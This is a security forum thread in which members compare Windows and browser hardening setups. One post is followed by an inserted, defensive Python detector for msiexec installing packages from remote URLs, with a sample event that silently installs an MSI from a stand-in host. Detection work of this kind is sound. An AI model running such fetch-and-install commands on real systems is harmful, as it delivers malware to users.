What is your security setup these days?

Discussion in 'other anti-malware software' started by dja2k, Dec 15, 2005.

  1. LoneWolf

    LoneWolf Registered Member

    Joined:
    Jan 2, 2006
    Posts:
    3,818
    Windows10
    Main line of defense.........
    Sphinx Firewall - AppGuard Solo - KeyScrambler - DeepFreeze

    Other Software..........
    Instant Recovery - AdGuard - AdGuard VPN - Proton Pass - Process Lasso

    Occasional Scan.........
    Emsisoft EEK + Eset Online
     
  2. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,800
    Location:
    Italy
    W.10 Home x64 22H2
    Local Account - Standard user - Limited permissions
    UAC maximum - Always notify
    Cloudflare DNS
    OneDrive, Cortana, Advertising ID, Web Search - disabled
    Usage of location data for Cortana disabled
    Telemetry OFF
    Removed some Windows optional features.

    Microsoft Defender Firewall hardened with H_C.
    Microsoft Defender hardened with Configure Defender (Customized level) - Cloud Block Level

    • Ransomware protection - disabled
    • No run in a sandbox
    • Core Isolation: Memory integrity - disabled
    • Some software hardened with maximum AE protection
    • All Windows Exploit Protection options - enabled

    MS Edge --disable-webgl --no-pings

    • Home page: https://start.duckduckgo.com/
    • Search engine = only DDG
    • Enabled Security Mitigations - Strict
    • Detection Protection - Strict
    • Clipboard permissions - blocked
    • Next DNS DOH - HaGeZi Multi PRO++ + OISD big
    • Share browsing data with other Windows features - disabled
    • Blocked cookies (also third parties):
    Code:
    abrahamjuliot.github.io
    ntp.msn.com
    c.msn.com
    assets.msn.com
    msn.com
    microsoftedge.microsoft.com
    fpt2.microsoft.com
    browserleaks.com
    Policies:

    • AutomaticHttpsDefault = 2
    • BrowserSignin = 0
    • HideFirstRunExperience - true
    • DnsOverHttpsMode = secure
    • DnsOverHttpsTemplates = Next DNS
    • TLSCipherSuiteDenyList = "0x002f","0x0035","0xc013","0x009c","0xc014","0x009d"
    • HubsSidebarEnabled - false
    • SyncDisabled - true
    • AudioSandboxEnabled - true
    • NetworkServiceSandboxEnabled - true
    • Edge3PSerpTelemetryEnabled - false
    • AllowSurfGame - false
    • ExtensionManifestV2Availability= 2
    • WebWidgetAllowed - false
    • ShowRecommendationsEnabled - false
    • ShowDownloadsInsecureWarningsEnabled = true
    • ManagedSearchEngines = [{"allow_search_engine_discovery":false},{"is_default":true,"name":"DuckDuckGo","keyword":"duckduckgo.com","search_url":"https://duckduckgo.com/?q={searchTerms}","suggest_url":"https://www.duckduckgo.com/qbox?query={searchTerms}","image_search_url":"https://www.duckduckgo.com/images/detail/search?iss=sbiupload"}]
    • ReadAloudEnabled - false
    Edge://flags:

    Enabled:

    • Block scripts loaded via document.write
    • TLS 1.3 Early Data
    • Block insecure private network requests.
    • Parallel downloading
    • Automatic HTTPS
    • Show block option in autoplay settings
    • Experimental Tracking Prevention Features
    • New PDF Viewer
    • Strict-Origin-Isolation
    • Bind cookies to their setting origin's port
    • Bind cookies to their setting origin's scheme
    • Origin-keyed Processes by default
    Extensions:
    • uBlock Origin Hard Mode with TLD's
    • AdGuard AdBlocker v.5.x.x. Hard Mode with TLD's - off by default
    • Stream Recorder - off by default
    • Video DownloadHelper - off by default

    Firefox

    • Home page: https://start.duckduckgo.com/
    • Search engine = only DDG
    • Next DNS DOH - HaGeZi Multi PRO++ + OISD big
    • Tracking protection: Strict
    • DNS over HTTPS : Max Protection
    • HTTPS-only-mode enabled
    • Pocket disabled
    • Clearing browsing data on exit
    • Firefox telemetry disabled
    • Protection against fraudulent content and dangerous software enabled - all enabled
    • Some FastFox.js settings
    • Some Arkenfox.js settings
    Policies
    • OverridePostUpdatePage set to ""
    • DontCheckDefaultBrowser = true
    • OverrideFirstRunPage set to ""
    Extensions
    • uBlock Origin - Hard Mode with TLD's
    • Video DownloadHelper - off by default
    • HLS Downloader - off by default
     
  3. LoneWolf

    LoneWolf Registered Member

    Joined:
    Jan 2, 2006
    Posts:
    3,818
    Windows10
    Main line of defense.........
    PortMaster Pro Firewall - AppGuard Solo - KeyScrambler Premium - DeepFreeze Standard

    Other Software..........
    Raxco Instant Recovery - Proton Pass Plus - Process Lasso Pro

    Occasional Scan.........
    Emsisoft EEK + Eset Online + DrWeb CureIt
     
    Last edited: Feb 6, 2025
  4. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,800
    Location:
    Italy
    W.10 Home x64 22H2
    Local Account - Standard user - Limited permissions
    UAC maximum - Always notify
    Cloudflare DNS
    OneDrive, Cortana, Advertising ID, Web Search - disabled
    Usage of location data for Cortana disabled
    Telemetry OFF
    Removed some Windows optional features.

    Microsoft Defender Firewall hardened with H_C.
    Microsoft Defender hardened with Configure Defender (Customized level) - Cloud Block Level

    • Ransomware protection - disabled
    • No run in a sandbox
    • Core Isolation: Memory integrity - disabled
    • Some software hardened with maximum AE protection
    • All Windows Exploit Protection options - enabled

    MS Edge --disable-webgl --no-pings

    • Home page: https://start.duckduckgo.com/
    • Search engine = only DDG
    • Enabled Security Mitigations - Balanced
    • Detection Protection - Strict
    • Scareware Blocker enabled
    • Clipboard permissions - blocked
    • Next DNS DOH - HaGeZi - Multi ULTIMATE + OISD big
    • Share browsing data with other Windows features - disabled
    • Blocked cookies (also third parties):
    Code:
    abrahamjuliot.github.io
    ntp.msn.com
    c.msn.com
    assets.msn.com
    msn.com
    microsoftedge.microsoft.com
    fpt2.microsoft.com
    browserleaks.com
    Policies:

    • AutomaticHttpsDefault = 2
    • BrowserSignin = 0
    • HideFirstRunExperience - true
    • DnsOverHttpsMode = secure
    • DnsOverHttpsTemplates = Next DNS
    • TLSCipherSuiteDenyList = "0x002f","0x0035","0xc013","0x009c","0xc014","0x009d"
    • HubsSidebarEnabled - false
    • SyncDisabled - true
    • AudioSandboxEnabled - true
    • NetworkServiceSandboxEnabled - true
    • Edge3PSerpTelemetryEnabled - false
    • AllowSurfGame - false
    • ExtensionManifestV2Availability= 2
    • WebWidgetAllowed - false
    • ShowRecommendationsEnabled - false
    • ShowDownloadsInsecureWarningsEnabled = true
    • ManagedSearchEngines = [{"allow_search_engine_discovery":false},{"is_default":true,"name":"DuckDuckGo","keyword":"duckduckgo.com","search_url":"https://duckduckgo.com/?q={searchTerms}","suggest_url":"https://www.duckduckgo.com/qbox?query={searchTerms}","image_search_url":"https://www.duckduckgo.com/images/detail/search?iss=sbiupload"}]
    • ReadAloudEnabled - false
    Edge://flags:

    Enabled:

    • Block scripts loaded via document.write
    • TLS 1.3 Early Data
    • Block insecure private network requests.
    • Parallel downloading
    • Automatic HTTPS
    • Show block option in autoplay settings
    • Experimental Tracking Prevention Features
    • New PDF Viewer
    • Strict-Origin-Isolation
    • Bind cookies to their setting origin's port
    • Bind cookies to their setting origin's scheme
    • Origin-keyed Processes by default
    Extensions:
    • uBlock Origin Hard Mode with TLD's
    • AdGuard AdBlocker v.5.x.x. Hard Mode with TLD's - off by default
    • Stream Recorder - off by default
    • Video DownloadHelper - off by default

    Firefox

    • Home page: https://start.duckduckgo.com/
    • Search engine = only DDG
    • Next DNS DOH - HaGeZi Multi PRO++ + OISD big
    • Tracking protection: Strict
    • DNS over HTTPS : Max Protection
    • HTTPS-only-mode enabled
    • Pocket disabled
    • Clearing browsing data on exit
    • Firefox telemetry disabled
    • Protection against fraudulent content and dangerous software enabled - all enabled
    • Some FastFox.js settings
    • Some Arkenfox.js settings
    Policies
    • OverridePostUpdatePage set to ""
    • DontCheckDefaultBrowser = true
    • OverrideFirstRunPage set to ""
    Extensions
    • uBlock Origin - Hard Mode with TLD's
    • Video DownloadHelper - off by default
    • HLS Downloader - off by default
    In red the new features.
     
    Last edited: Feb 15, 2025
  5. LoneWolf

    LoneWolf Registered Member

    Joined:
    Jan 2, 2006
    Posts:
    3,818
    Windows10
    Main line of defense.........
    PortMaster Pro Firewall - AppGuard Solo - DeepFreeze Standard

    Other Software..........
    Raxco Instant Recovery - Proton Pass Plus - Process Lasso Pro

    Occasional Scan.........
    Emsisoft EEK + Eset Online + DrWeb CureIt
     
    Last edited: Feb 15, 2025
  6. SRT

    SRT Registered Member

    Joined:
    Feb 28, 2021
    Posts:
    132
    Location:
    USA
    Eset Premium, AppGuard Solo, OSArmor, SysHardener.
    And of course Macrium Reflect 8.
     
  7. Bertazzoni

    Bertazzoni Registered Member

    Joined:
    Apr 13, 2018
    Posts:
    745
    Location:
    Milan, Italia
    Windows 11 23H2
    MS Defender
    Aomei Backupper Pro
    Windows built-in system image
    Firefox - Privacy Badger
    Edge - Privacy Badger
     
    Last edited: Feb 16, 2025
  8. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,800
    Location:
    Italy
    Hi,:)
    can you explain why in both of your browsers you decided to use only PB?
    TH.
     
  9. Bertazzoni

    Bertazzoni Registered Member

    Joined:
    Apr 13, 2018
    Posts:
    745
    Location:
    Milan, Italia
    I block mostly trackers and not concerned too much with ads. In fact, I rarely see any with the browsing I do. I keep µBO around primarily for paywalls, when needed.
     
  10. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,800
    Location:
    Italy
    :thumb:
    Consider that not all trackers that appear to be blocked by PB, highlighted in the extension GUI, are actually blocked by PB; many are blocked only by Firefox's internal anti-trackers feature, Edge.
    With Firefox's development tools (Edge always consider client) you can check this.
    ;):)
     
  11. Bertazzoni

    Bertazzoni Registered Member

    Joined:
    Apr 13, 2018
    Posts:
    745
    Location:
    Milan, Italia
    The same is true for µBO with my minimalist filter lists. Edge is similar.

    What I like about PB is that it's sponsored by the Electronic Frontier Foundation and has very good, ongoing and regular maintenance. And no shady telemetry, etc.
     
    Last edited: Feb 17, 2025
  12. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,800
    Location:
    Italy
    Yes, I understand completely.
    I too chose PB as the trackers control extension, in my tests, for the same reasons.
     
  13. Moose World

    Moose World Registered Member

    Joined:
    Dec 19, 2013
    Posts:
    921
    Location:
    U.S. Citizen
    @LoneWolf,
    Just a reminder that Raxco,.....
    That Raxco had filed for Chapter 7 Bankruptcy. Upon going to their website discovered that it was indeed true.
    Maybe it's time to start looking for a replacement. Your thoughts would be appreciated...

    What do you think about Ashampoo Backup Pro 26:)?
    "Ashampoo Backup Pro 26 takes the fear out of viruses, ransomware and hardware errors!"
    Just wondering?
     
    Last edited: Feb 18, 2025
  14. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    27,162
    Location:
    UK
  15. LoneWolf

    LoneWolf Registered Member

    Joined:
    Jan 2, 2006
    Posts:
    3,818
    Software still works fine here so I'll keep it for now. Only thing is once uninstalled that's it, no activations. I've no experience with Ashampoo so I can not comment either way.
     
  16. Moose World

    Moose World Registered Member

    Joined:
    Dec 19, 2013
    Posts:
    921
    Location:
    U.S. Citizen
  17. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,800
    Location:
    Italy
    W.10 Home x64 22H2
    Local Account - Standard user - Limited permissions
    UAC maximum - Always notify
    Cloudflare DNS
    OneDrive, Cortana, Advertising ID, Web Search - disabled
    Usage of location data for Cortana disabled
    Telemetry OFF
    Removed some Windows optional features.

    Microsoft Defender Firewall hardened with H_C.
    Microsoft Defender hardened with Configure Defender (Customized level) - Cloud Block Level

    • Ransomware protection - disabled
    • No run in a sandbox
    • Core Isolation: Memory integrity - disabled
    • Some software hardened with maximum AE protection
    • All Windows Exploit Protection options - enabled

    MS Edge
    --disable-webgl --no-pings --enable-features="NetworkServiceSandbox,EnableCsrssLockdown,WinSboxDisableExtensionPoint"
    • Home page: https://start.duckduckgo.com/
    • Search engine = only DDG
    • Enabled Security Mitigations - Balanced
    • Detection Protection - Strict
    • Scareware Blocker enabled
    • Clipboard permissions - blocked
    • Next DNS DOH - HaGeZi - Multi ULTIMATE + OISD big
    • Share browsing data with other Windows features - disabled
    • Blocked cookies (also third parties):
    Code:
    abrahamjuliot.github.io
    ntp.msn.com
    c.msn.com
    assets.msn.com
    msn.com
    microsoftedge.microsoft.com
    fpt2.microsoft.com
    browserleaks.com
    Policies:

    • AutomaticHttpsDefault = 2
    • BrowserSignin = 0
    • HideFirstRunExperience - true
    • DnsOverHttpsMode = secure
    • DnsOverHttpsTemplates = Next DNS
    • TLSCipherSuiteDenyList = "0x002f","0x0035","0xc013","0x009c","0xc014","0x009d"
    • HubsSidebarEnabled - false
    • SyncDisabled - true
    • AudioSandboxEnabled - true
    • NetworkServiceSandboxEnabled - true
    • Edge3PSerpTelemetryEnabled - false
    • AllowSurfGame - false
    • ExtensionManifestV2Availability= 2
    • WebWidgetAllowed - false
    • ShowRecommendationsEnabled - false
    • ShowDownloadsInsecureWarningsEnabled = true
    • ManagedSearchEngines = [{"allow_search_engine_discovery":false},{"is_default":true,"name":"DuckDuckGo","keyword":"duckduckgo.com","search_url":"https://duckduckgo.com/?q={searchTerms}","suggest_url":"https://www.duckduckgo.com/qbox?query={searchTerms}","image_search_url":"https://www.duckduckgo.com/images/detail/search?iss=sbiupload"}]
    • ReadAloudEnabled - false
    Edge://flags:

    Enabled:

    • Block scripts loaded via document.write
    • TLS 1.3 Early Data
    • Block insecure private network requests.
    • Parallel downloading
    • Automatic HTTPS
    • Show block option in autoplay settings
    • Experimental Tracking Prevention Features
    • New PDF Viewer
    • Strict-Origin-Isolation
    • Bind cookies to their setting origin's port
    • Bind cookies to their setting origin's scheme
    • Origin-keyed Processes by default
    Extensions:
    • uBlock Origin - Hard Mode with TLD's
    • Stream Recorder - (off by default)
    • Video DownloadHelper - (off by default)
    • AdGuard AdBlocker v.5.x - Hard Mode with TLD's - (off by default)

    Firefox

    • Home page: https://start.duckduckgo.com/
    • Search engine = only DDG
    • Next DNS DOH - HaGeZi Multi PRO++ + OISD big
    • Tracking protection: Strict
    • DNS over HTTPS : Max Protection
    • HTTPS-only-mode enabled
    • Pocket disabled
    • Clearing browsing data on exit
    • Firefox telemetry disabled
    • Protection against fraudulent content and dangerous software enabled - all enabled
    • Some FastFox.js settings
    • Some Arkenfox.js settings
    Policies
    • OverridePostUpdatePage set to ""
    • DontCheckDefaultBrowser = true
    • OverrideFirstRunPage set to ""
    Extensions
    • uBlock Origin - Hard Mode with TLD's
    • Video DownloadHelper - (off by default)
    • HLS Downloader - (off by default)
     
    Last edited: Mar 9, 2025
  18. Nanobot

    Nanobot Registered Member

    Joined:
    Jun 23, 2010
    Posts:
    485
    Location:
    Neo Tokyo
    There are two "Ping Blocker" extensions on the Edge/Chrome store, which one are you using?
     
  19. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,800
    Location:
    Italy
    Ping Blocker 0.1.3 with CSP Report disabled.
     
  20. n8chavez

    n8chavez Registered Member

    Joined:
    Jul 19, 2003
    Posts:
    3,715
    Location:
    Location Unknown
    I suggest everyone check out Carifred. They make excellent, free software. In particular, check out the immunization function of UVK or the SOS suite. From what I can tell, they overlap in function. They are aimed at preventing maliciousness by disabling things like autorun manipulation. They've been a part of my security setup for years.

    (link made purposefully unclickable)

    www.carifred.com
     
    Last edited: Mar 3, 2025
  21. G1111

    G1111 Registered Member

    Joined:
    May 11, 2005
    Posts:
    2,304
    Location:
    USA
    Windows 11 Pro 24H2

    Firewall & Anti-Virus:
    Router (Hardware Firewall)
    Windows Defender Firewall
    Malwarebytes Premium 5.2.7.167

    Blocking/Hardening:
    AppGuard Solo 6.7.129.2
    HitmanPro.Alert 3.20.2 Build 2019
    Quad9 DNS
    User Account Control (Always Notify)
     
  22. moredhelfinland

    moredhelfinland Registered Member

    Joined:
    Mar 31, 2009
    Posts:
    410
    Location:
    Finland
    Now running Sophos Home Premium with Netlimiter Blocker as kernel mode firewall. I set a block rule for PowerShell and scripting host to not connect outside.
    Two days ago I tested this combo against one malware that steals your browser credentials. At the time of testing this malware, VT showed only 4 detections.
    Simply put, this malware uses (in a legit way) PowerShell to run msiexec, and msiexec downloads zero day malware to steal your browser credentials. So blocking PowerShell (or scripting host) connecting outside is useless in this case.
    Emsisoft: Fails, browser credentials stolen and sent to a server
    G Data: Fails, browser credentials stolen and sent to a server
    Sophos Home Premium: Block (detected as Mitre ATT&CK T1555.003)
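
The gap described in this post, as an added detection example (not part of the original post and not any vendor's code): a per-process outbound block on the script hosts never fires because msiexec.exe is the process that connects, so the check below keys on msiexec being started with a remote package URL. Field names follow Sysmon process-creation records; the sample events, the URL, and the assumption that the URL appears on the msiexec command line are constructed for illustration.

```python
import ntpath
import re

# Interpreters covered by the post's outbound block rule (plus pwsh as a sibling).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}

# msiexec install switch, and a remote package location on the same command line.
INSTALL_SWITCH = re.compile(r"(?i)(?:^|\s)[/-](?:i|package)\b")
REMOTE_URL = re.compile(r"(?i)\bhttps?://[^\s\"']+")


def base(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def egress_rule_blocks(event, blocked=SCRIPT_HOSTS):
    """Per-process outbound block rule: matches only on the connecting image."""
    return base(event["Image"]) in blocked


def flag_remote_msi(events):
    """Return findings for msiexec.exe started to install a package from a URL."""
    findings = []
    for ev in events:
        if base(ev["Image"]) != "msiexec.exe":
            continue
        cmd = ev["CommandLine"]
        url = REMOTE_URL.search(cmd)
        if not (INSTALL_SWITCH.search(cmd) and url):
            continue  # local installs are not flagged
        parent = base(ev["ParentImage"])
        findings.append({
            "parent": parent,
            "url": url.group(0),
            "severity": "high" if parent in SCRIPT_HOSTS else "medium",
            # Shows why the firewall rule alone misses this chain.
            "egress_rule_would_block": egress_rule_blocks(ev),
        })
    return findings


# Constructed sample process-creation records (not taken from the post).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -File C:\\Users\\test\\setup.ps1"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "msiexec.exe /q /i https://downloads.example.invalid/pkg.msi"},
    {"Image": r"C:\Windows\System32\msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'msiexec.exe /i "C:\Users\test\Downloads\app.msi"'},
]

if __name__ == "__main__":
    for finding in flag_remote_msi(SAMPLE_EVENTS):
        print(finding)
```
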
     
  23. Moose World

    Moose World Registered Member

    Joined:
    Dec 19, 2013
    Posts:
    921
    Location:
    U.S. Citizen
    @moredhelfinland,
    Details are so very important!
    Thank you for sharing, very useful information.
    What about OS Armor:)?
     
  24. moredhelfinland

    moredhelfinland Registered Member

    Joined:
    Mar 31, 2009
    Posts:
    410
    Location:
    Finland
    @Moose World
    OSArmor is my first line of defense. Just enable all "suspicious" and malformed scripts protection, you're good to go. OSA uses its own driver, so it does rely on silly windows defender "ASR" rules etc...
    And it reacts fast, it's funny to see it block while "your antivirus name here" is still doing "cloud lookups" etc stuff.
    The BAD thing was OSA renewing: I bought it for 19.99 euros, the renewal price was 24 euros. Wtf? Cancelled, and bought OSA again for 19.99. Saved 5 euros for more beer. lol.
     
  25. Sampei Nihira

    Sampei Nihira Registered Member

    Joined:
    Apr 7, 2013
    Posts:
    3,800
    Location:
    Italy
    I have a curiosity to ask all Wilders members who use Chromium-based browsers + Intel CPUs.
    Has anyone enabled the sandbox in the browser for the RIDL attack and if so has anyone verified before/after a decrease in browser performance?

    It would appear that there is a 20% decrease.

    I have an AMD CPU so personally I am not concerned.
     